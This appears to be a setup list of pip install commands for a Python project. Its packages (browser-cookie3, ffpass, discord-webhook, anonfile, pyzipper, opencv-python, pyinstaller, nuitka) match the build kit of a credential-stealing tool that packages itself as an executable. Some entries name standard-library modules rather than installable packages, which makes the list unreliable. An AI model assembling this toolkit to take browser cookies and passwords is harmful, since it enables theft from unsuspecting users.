##need update##
pip install --upgrade pip
pip install pytest-shutil
pip install nuitka
pip install pyinstaller
pip install requests
pip install pywin32
pip install opencv-python
pip install Pillow
pip install pyzipper
pip install anonfile
pip install subprocess.run
pip install uuid
pip install typing
pip install psutil
pip install GPUtil
pip install tabulate
pip install pycryptodome
pip install configparser
pip install ffpass
pip install discord-webhook
pip install browser-cookie3
